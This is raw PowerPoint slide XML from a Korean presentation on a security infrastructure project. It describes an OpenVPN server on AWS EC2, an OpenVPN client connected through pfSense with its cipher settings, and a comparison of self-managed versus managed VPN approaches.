                  <a:solidFill>
                    <a:srgbClr val="CBD5E1"/>
                  </a:solidFill>
                  <a:latin typeface="Noto Sans KR"/>
                  <a:ea typeface="Noto Sans KR"/>
                </a:rPr>
                <a:t>접근 방식</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="Text 46"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7917332" y="3424241"/>
              <a:ext cx="1433779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직접 관리 (High Effort)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55" name="Text 48"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9635033" y="3424241"/>
              <a:ext cx="1643177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관리형 서비스 (Low Effort)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="57" name="Text 50"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6749187" y="3921123"/>
              <a:ext cx="471830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000" b="1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확장성</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="58" name="Text 51"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8117128" y="3928355"/>
              <a:ext cx="1034186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ko-KR" alt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장비 증설 필요</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="60" name="Text 53"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9816085" y="3927718"/>
              <a:ext cx="1281989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Client </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" alt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추가로 즉시 확장</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="Text 55"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6749187" y="4417273"/>
              <a:ext cx="633679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000" b="1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장애 대응</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="63" name="Text 56"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7890358" y="4417273"/>
              <a:ext cx="1491386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ko-KR" alt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장비 장애 시 서비스 중단</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="65" name="Text 58"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9653322" y="4424602"/>
              <a:ext cx="1616659" cy="188874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ko-KR" alt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클라우드 인프라로 고가용성</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="68" name="Shape 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6520587" y="4728535"/>
              <a:ext cx="1218895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9" name="Shape 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7735825" y="4728535"/>
              <a:ext cx="1800454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0" name="Shape 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9532621" y="4728535"/>
              <a:ext cx="1848002" cy="7329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1" name="Shape 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6520587" y="4736596"/>
              <a:ext cx="1218895" cy="488821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" name="Text 55"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6749187" y="4904423"/>
              <a:ext cx="633679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000" b="1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보안 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1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제어</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="73" name="Text 56"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7917332" y="4904421"/>
              <a:ext cx="1491386" cy="15316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ko-KR" alt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장비 단위</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="75" name="Text 58"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9670390" y="4905940"/>
              <a:ext cx="1548384" cy="15988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ctr">
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr 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pfSense + </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="10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보안 정책 연동</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="565201" y="5223357"/>
            <a:ext cx="5333695" cy="1013460"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5333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1" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1261974" y="5636666"/>
            <a:ext cx="1984146" cy="5194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Layer 3 VPN (TUN Interface)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TLS/SSL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기반 암호화 터널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X.509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인증서 기반 상호 인증</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="Text 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1261974" y="5291480"/>
            <a:ext cx="2438705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 </a:t>
            </a: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기술 스택 요약</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3412237" y="5629808"/>
            <a:ext cx="2205126" cy="5194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AES-GCM / ChaCha20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암호화 지원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방화벽 정책과 연계 가능</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="84" name="Image 8" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId8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130" r="-130"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="847344" y="5356729"/>
            <a:ext cx="179797" cy="2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6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71500" y="381305"/>
            <a:ext cx="761695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Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="1037844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네트워크 흐름 제어 및 외부 서비스 연결 정책</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="523951"/>
            <a:ext cx="5353812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 VPN Client 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구성</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="3212426"/>
            <a:ext cx="5085080" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 302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Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="764263" y="3318430"/>
            <a:ext cx="4539082" cy="76267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는 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 Client(TUN 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모드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 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로 설정되어 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OpenVPN Server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와 연결</a:t>
            </a:r>
          </a:p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Protocol: UDP4</a:t>
            </a:r>
          </a:p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Mode: Peer to Peer (SSL/TLS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="3224790"/>
            <a:ext cx="5471160" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 302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 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6266840" y="3338752"/>
            <a:ext cx="4860900" cy="76267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암호화 알고리즘</a:t>
            </a:r>
          </a:p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 Data Ciphers: AES-256-GCM, AES-128-GCM, CHACHA20-POLY1305</a:t>
            </a:r>
          </a:p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 Digest: SHA256</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571499" y="5776316"/>
            <a:ext cx="10995659" cy="821254"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 302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 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="764262" y="5897888"/>
            <a:ext cx="10620017" cy="56356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 OpenVPN Client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가 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OpenVPN Server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와 정상 연결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(Connected) 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상태</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pP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가상 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IP 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할당 확인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: 10.8.0.2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pP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실시간 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Bytes Sent / Received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를 통해 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트래픽 가시성 확보</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="120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10" name="Shape 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipV="1">
            <a:off x="99058" y="3684867"/>
            <a:ext cx="990601" cy="45719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Shape 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipV="1">
            <a:off x="5609918" y="3697229"/>
            <a:ext cx="990601" cy="45719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515808" y="4282338"/>
            <a:ext cx="11104692" cy="1421391"/>
            <a:chOff x="371246" y="1537106"/>
            <a:chExt cx="7582205" cy="4949647"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29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5" name="Shape 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipV="1">
            <a:off x="183731" y="6164084"/>
            <a:ext cx="821254" cy="45719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21077" y="1504321"/>
            <a:ext cx="11067038" cy="1553679"/>
            <a:chOff x="371246" y="1537106"/>
            <a:chExt cx="7582205" cy="4949647"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17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300" t="40810" r="4090" b="27160"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="1545288"/>
            <a:ext cx="10955655" cy="14642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550" t="39710" r="2550" b="26900"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="4329352"/>
            <a:ext cx="10995660" cy="132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76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571500" y="1047902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하이브리드 클라우드 연결 및 관리자 보안 접근 아키텍처</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="533095"/>
            <a:ext cx="4625340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 VPN server 구성</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="4674236"/>
            <a:ext cx="5429707" cy="1812518"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2051"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E293B">
              <a:alpha val="6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Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="4674236"/>
            <a:ext cx="38405" cy="1812518"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FBBF24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Shape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="800100" y="5110298"/>
            <a:ext cx="5009998" cy="7341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 rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="-1280" r="-1280"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="800100" y="4826932"/>
            <a:ext cx="219456" cy="176920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0100" y="5239381"/>
            <a:ext cx="133502" cy="124184"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="5227755"/>
            <a:ext cx="3233420" cy="16884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AWS EC2(Ubuntu)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인스턴스에 </a:t>
            </a:r>
            <a:r>
              <a:rPr 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OpenVPN Server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구축</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="100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0100" y="5481637"/>
            <a:ext cx="133502" cy="124184"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="5469277"/>
            <a:ext cx="3233420" cy="16884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systemd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기반 서비스로 등록되어 부팅 시 자동 실행</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="100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0100" y="5723160"/>
            <a:ext cx="133502" cy="124184"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="5710801"/>
            <a:ext cx="2531974" cy="55131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서비스 상태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</a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pP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 openvpn.service → active (enabled)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pP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안정적으로 백그라운드 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서비스 제공</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="1">
              <a:solidFill>
                <a:srgbClr val="CBD5E1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23" name="Shape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6191402" y="4674236"/>
            <a:ext cx="5429707" cy="1812518"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2051"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E293B">
              <a:alpha val="6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Shape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6191402" y="4674236"/>
            <a:ext cx="38405" cy="1812518"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="34D399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Shape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6420002" y="5110298"/>
            <a:ext cx="5009998" cy="7341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20002" y="4826932"/>
            <a:ext cx="190195" cy="176920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Text 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1133856" y="4826931"/>
            <a:ext cx="2269541" cy="1916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OpenVPN Server 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구성</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Text 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6724498" y="4826931"/>
            <a:ext cx="1964131" cy="1916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서버 역할</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="55" name="Image 1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495898" y="5239381"/>
            <a:ext cx="133502" cy="124184"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6724498" y="5227755"/>
            <a:ext cx="3233420" cy="16884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외부 네트워크와 내부망을 연결하는 중앙 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허브</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="57" name="Image 2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495898" y="5481637"/>
            <a:ext cx="133502" cy="124184"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6724498" y="5469277"/>
            <a:ext cx="3233420" cy="16884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pfSense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및 관리자 단말의 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접속을 중계</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="59" name="Image 3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495898" y="5723160"/>
            <a:ext cx="133502" cy="124184"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Text 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6724498" y="5710801"/>
            <a:ext cx="3384702" cy="27117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인증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암호화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세션 관리 기능을 서버 단에서 통합 수행</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="1">
              <a:solidFill>
                <a:srgbClr val="CBD5E1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6" name="Shape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="381305"/>
            <a:ext cx="761695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71916" y="1481461"/>
            <a:ext cx="11040360" cy="3116324"/>
            <a:chOff x="371246" y="1537106"/>
            <a:chExt cx="7582205" cy="4949647"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9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400" t="1580" b="20"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="647700" y="1557223"/>
            <a:ext cx="10875264" cy="297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7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571500" y="990295"/>
            <a:ext cx="761695" cy="57607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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="1333195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보안 인프라 구축 프로젝트 발표 순서</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="276149"/>
            <a:ext cx="1162202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kern="0" spc="-9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목차</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="1867205"/>
            <a:ext cx="5238598" cy="76169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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="1867205"/>
            <a:ext cx="38405" cy="76169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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1410005" y="2018995"/>
            <a:ext cx="457200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0E7490"/>
          </a:solidFill>
          <a:ln/>
          <a:effectLst>
            <a:outerShdw blurRad="101600" dist="12700" dir="16200000" algn="bl" rotWithShape="0">
              <a:srgbClr val="22D3EE">
                <a:alpha val="3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8079" y="2157070"/>
            <a:ext cx="181051" cy="181051"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="2020824"/>
            <a:ext cx="365028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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="2291486"/>
            <a:ext cx="361645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목표, 범위 및 산출물 정의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6381598" y="1867205"/>
            <a:ext cx="5238598" cy="76169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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6381598" y="1867205"/>
            <a:ext cx="38405" cy="76169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7220102" y="2018995"/>
            <a:ext cx="457200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0E7490"/>
          </a:solidFill>
          <a:ln/>
          <a:effectLst>
            <a:outerShdw blurRad="101600" dist="12700" dir="16200000" algn="bl" rotWithShape="0">
              <a:srgbClr val="22D3EE">
                <a:alpha val="3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rcRect l="-1403" r="-1403"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7343546" y="2157070"/>
            <a:ext cx="209398" cy="181051"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7867498" y="2020824"/>
            <a:ext cx="365028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네트워크 구조</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7867498" y="2291486"/>
            <a:ext cx="361645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네트워크 조직도 및 트래픽 흐름</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Shape 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="2819095"/>
            <a:ext cx="5238598" cy="76169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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="2819095"/>
            <a:ext cx="38405" cy="76169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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6381598" y="2819095"/>
            <a:ext cx="5238598" cy="76169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Shape 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6381598" y="2819095"/>
            <a:ext cx="38405" cy="76169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8" name="Shape 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1410004" y="2959838"/>
            <a:ext cx="457200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0E7490"/>
          </a:solidFill>
          <a:ln/>
          <a:effectLst>
            <a:outerShdw blurRad="101600" dist="12700" dir="16200000" algn="bl" rotWithShape="0">
              <a:srgbClr val="22D3EE">
                <a:alpha val="3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48079" y="3097912"/>
            <a:ext cx="181051" cy="181051"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
